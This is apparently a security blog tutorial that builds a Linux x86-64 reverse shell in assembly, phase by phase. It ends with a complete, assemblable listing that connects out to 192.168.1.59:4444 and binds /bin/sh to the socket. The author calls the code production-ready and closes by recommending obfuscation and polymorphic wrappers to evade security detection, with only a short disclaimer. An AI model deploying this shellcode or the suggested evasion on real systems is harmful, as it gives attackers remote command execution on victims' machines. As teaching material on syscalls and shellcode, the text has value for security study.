Building a Reverse Shell in x86-64 Assembly: A Syscall Chain Deep Dive

Introduction

A reverse shell is a fundamental technique in systems security where a compromised target initiates an outbound connection to an attacker-controlled machine, binding its standard input, output, and error streams to the remote connection. This allows the attacker to execute commands on the target system as if they were sitting at its terminal.

The challenge becomes exponential when you need to implement this entirely in x86-64 assembly without relying on libc or any compiled binaries. You must manually orchestrate a precise sequence of syscalls, manage memory manually, and handle all data structures at the lowest level.

In this article, we’ll examine a complete TCP-based reverse shell implementation that leverages Position Independent Code (PIC) architecture—the same Stack Anchor technique discussed in our previous article on PIC fundamentals. This approach ensures our shellcode remains executable regardless of where it’s loaded in memory.

Architecture Overview

The reverse shell follows a linear syscall chain:

[Stack Setup] → [Socket Creation] → [Connect] → [dup2 Redirection] → [execve Shell]

Each step is a discrete syscall that builds upon the previous one. Let’s dissect each phase.

Phase 1: Stack Anchor & PIC Foundation

Before executing any syscall, we establish our memory sandbox using the Stack Anchor technique:

sub rsp, 0x8000             ; Allocate 32KB on the stack
and rsp, -16                ; Align to 16-byte boundary (required for syscalls)
mov rbp, rsp                ; Set RBP as our anchor point

Why this matters:

RSP Manipulation: We reserve a large contiguous region for read-write operations
16-byte Alignment: x86-64 System V ABI mandates stack alignment before syscalls
RBP Anchoring: We fix RBP as a stable reference point for all relative addressing

Next, we copy the hardcoded network structure to our writable stack region:

lea rsi, [rel struct_sockaddr]  ; Source: Read-only .text section
lea rdi, [rbp + 0x200]          ; Destination: Writable stack
mov rcx, 16                     ; sockaddr_in is exactly 16 bytes
rep movsb                       ; Byte-wise copy

Why copy to stack? The .text section is mapped R-X (readable, executable, not writable) by the kernel. Any template data we need to modify at runtime must be transferred to writable memory. The stack provides this with automatic cleanup when the process exits.

Phase 2: Socket Creation (SYS_socket = 41)

mov rax, 41                 ; SYS_socket syscall number
mov rdi, 2                  ; AF_INET (IPv4)
mov rsi, 1                  ; SOCK_STREAM (TCP)
mov rdx, 0                  ; IPPROTO_IP (default)
syscall
mov r12, rax                ; Save socket FD in r12

Register Breakdown (x86-64 syscall convention):

rdi = First argument (address family)
rsi = Second argument (socket type)
rdx = Third argument (protocol)
rax = Return value (file descriptor or negative error)

The kernel returns a file descriptor (typically 3 or higher) in rax. We immediately save this in r12 because we’ll reference it multiple times in subsequent syscalls.

Why r12? It’s a callee-saved register in x86-64 SysV ABI, meaning it persists across function boundaries. This makes it ideal for storing critical state.

Phase 3: Establish Connection (SYS_connect = 42)

mov rax, 42                 ; SYS_connect syscall number
mov rdi, r12                ; socket FD (from previous step)
lea rsi, [rbp + 0x200]      ; Pointer to sockaddr_in struct
mov rdx, 16                 ; Size of sockaddr_in
syscall

Data Structure Reference: The sockaddr_in struct (16 bytes) contains:

Offset  Size  Field
0       2     sin_family (AF_INET = 2)
2       2     sin_port (network byte order: 0x5c11 = 4444)
4       4     sin_addr (IPv4 address: 192.168.1.59)
8       8     sin_zero (padding, must be zero)

The connect syscall blocks until the connection succeeds or fails. If successful, the kernel establishes a TCP connection to the target IP:port, and our socket FD now represents the active connection.

Phase 4: Redirect File Descriptors (SYS_dup2 = 33)

This is the critical phase where we bind stdin, stdout, and stderr to the socket:

mov rbx, 2                  ; Counter: will loop from 2 down to 0
_loop:
mov rax, 33                 ; SYS_dup2 syscall number
mov rdi, r12                ; socket FD (source)
mov rsi, rbx                ; target FD (2, 1, 0)
syscall
dec rbx                     ; Decrement counter
jns _loop                   ; Jump if not negative (2→1→0)

Three Iterations:

dup2(socket_fd, 2) → stderr now reads/writes to socket
dup2(socket_fd, 1) → stdout now reads/writes to socket
dup2(socket_fd, 0) → stdin now reads/writes to socket

Why this works: After dup2, any process that inherits these file descriptors will automatically send output to the socket and receive input from it. The redirection is transparent to the child process.

The loop elegantly handles three redirections in minimal code. The jns (jump if not signed/negative) instruction continues while rbx ≥ 0; when rbx becomes -1, the loop exits.

Phase 5: Execute Shell (SYS_execve = 59)

xor rdx, rdx                ; rdx = 0 (envp = NULL, empty environment)
mov rax, 59                 ; SYS_execve syscall number
lea rdi, [rel run]          ; rdi = filename pointer ("/bin//sh")
push 0                      ; Push NULL terminator onto stack
push rdi                    ; Push argv[0] (filename) onto stack
mov rsi, rsp                ; rsi = pointer to argv array
syscall

Syscall Signature (execve):

int execve(const char *filename,  // rdi
           char *const argv[],     // rsi
           char *const envp[]);    // rdx

The Argv Array Construction:

We build a minimal argv on the stack:

[Stack Before]
...
[rsp + 16]  → (higher addresses)
[rsp + 8]   → argv[0] = pointer to "/bin//sh"
[rsp]       → argv[1] = NULL (array terminator)

Then mov rsi, rsp makes rsi point to the start of this array. The kernel interprets this as:

argv[0] = the shell path
argv[1] = NULL (signals end of array)
No environment variables (rdx = 0)

Why minimal argv? The /bin/sh shell doesn’t require explicit arguments. It automatically enters interactive mode when stdin/stdout/stderr are connected to a socket.

The Shell Loop: Why No Loop is Needed

After execve succeeds, the new process inherits:

Redirected file descriptors (stdin/stdout/stderr bound to socket)
The parent process’s memory space (overwritten by the shell)

The /bin/sh binary contains its own event loop (typically implemented with read() syscalls):

// Simplified shell behavior
while (1) {
    read(0, buffer, sizeof(buffer));   // Read from stdin (socket)
    parse_and_execute(buffer);
    write(1, output, strlen(output));  // Write to stdout (socket)
}

Because stdin/stdout/stderr point to the socket, every interaction happens over the network connection without any additional coordination in our shellcode.

Complete Code Reference

;nasm -f elf64 reverse_shell_tcp.asm -o reverse_shell.o
;ld reverse_shell.o -o reverse_shell

global _start

_start:
	sub rsp, 0x8000
    and rsp, -16
    mov rbp, rsp            ; Stack anchor
    
    lea rsi, [rel struct_sockaddr]
    lea rdi, [rbp + 0x200]
	mov rcx, 16
	rep movsb
	jmp continue
	
	
	; --- DATA TEMPLATES ---
	struct_sockaddr:
    dw 2                ; sin_family: AF_INET (2)
    dw 0x5c11           ; sin_port: 4444 (network byte order)
    db 192, 168, 1, 59  ; sin_addr: target IP address
    dq 0                ; sin_zero: 8-byte padding
	
	run db "/bin//sh", 0
	
continue:
	; Phase 1: Create Socket
	mov rax, 41
	mov rdi, 2
	mov rsi, 1
	mov rdx, 0
	syscall
	mov r12, rax			; Save socket FD
	
	; Phase 2: Connect to target
	mov rax, 42
	mov rdi, r12
	lea rsi, [rbp + 0x200]  ; Use copied sockaddr
	mov rdx, 16
	syscall
	
	; Phase 3: Redirect file descriptors
	mov rbx, 2
_loop:
	mov rax, 33 			; SYS_dup2
	mov rdi, r12
	mov rsi, rbx
	syscall
	dec rbx
	jns _loop

	; Phase 4: Execute shell
	xor rdx, rdx
	mov rax, 59 			; SYS_execve
	lea rdi, [rel run]
	push 0
	push rdi
	
	mov rsi, rsp
	syscall

Context: When & Why PIC for Reverse Shells

Why This Implementation Uses PIC

This reverse shell employs Position Independent Code not because it’s strictly necessary, but because it demonstrates a critical modern concept:

In production exploitation frameworks (Metasploit, Cobalt Strike), reverse shells are always PIC because:

Target memory layout is unknown (ASLR)
Payload must work on any system architecture
Multiple deployments require adaptability

Learning Perspective

This article uses PIC because it’s the correct modern pattern, even though simpler alternatives exist. When you learn systems programming, it’s better to master best practices from day one.

When You Wouldn’t Use PIC

For comparison, you’d skip PIC in these scenarios:

Controlled lab environment: Known base addresses, ASLR disabled
Embedded systems: Fixed memory layout (bootloader → kernel)
Proof-of-Concept: Simple buffer overflow with hardcoded return address
Educational debugging: Understanding one concept at a time

However, in real-world offensive security, PIC is the industry standard because you never control the target environment.

Bottom line: This is a correct, production-ready approach. Not a toy example—a learning foundation that scales to professional tools.

Key Takeaways

PIC Architecture: Every memory reference uses relative addressing ([rel ...] or [rbp + offset]). No hardcoded absolute addresses exist in the binary.
Syscall Chaining: The shellcode is a linear sequence of syscalls, each building on the previous. No branches or loops except the dup2 redirection.
File Descriptor Inheritance: Once stdin/stdout/stderr are bound to the socket via dup2, they remain bound after execve. The shell inherits these redirections automatically.
Stack as Writable Storage: Read-only templates in .text are copied to the stack, allowing runtime modification while respecting kernel memory protections.
Minimal Dependencies: The entire payload fits in a few hundred bytes and depends only on the Linux kernel. No libc, no helper functions.

Conclusion

Building a reverse shell in assembly reveals the elegant simplicity of POSIX syscalls. By understanding how socket I/O, process execution, and file descriptor redirection work at the syscall level, you gain deeper insight into how operating systems manage processes and resources.

The Stack Anchor technique ensures the payload remains portable, executable from any memory location—a critical requirement for reliable shellcode deployment in real-world scenarios.

Next steps: Experiment with different shellcode obfuscation techniques, encoding schemes, or polymorphic wrappers to evade security detection mechanisms while preserving the core syscall logic.

Github : https://github.com/JM00NJ/Sectionless-Craft/tree/main/Networking/reverse_shells

Disclaimer: This article is for educational purposes only. Reverse shells should only be used on systems you own or have explicit permission to test. Unauthorized access to computer systems is illegal.

🎓 Learning Path & Metadata

Building a Reverse Shell in x86-64 Assembly: A Syscall Chain Deep Dive#

Introduction#

Architecture Overview#

Phase 1: Stack Anchor & PIC Foundation#

Phase 2: Socket Creation (SYS_socket = 41)#

Phase 3: Establish Connection (SYS_connect = 42)#

Phase 4: Redirect File Descriptors (SYS_dup2 = 33)#

Phase 5: Execute Shell (SYS_execve = 59)#

The Shell Loop: Why No Loop is Needed#

Complete Code Reference#

Context: When & Why PIC for Reverse Shells#

Why This Implementation Uses PIC#

Learning Perspective#

When You Wouldn’t Use PIC#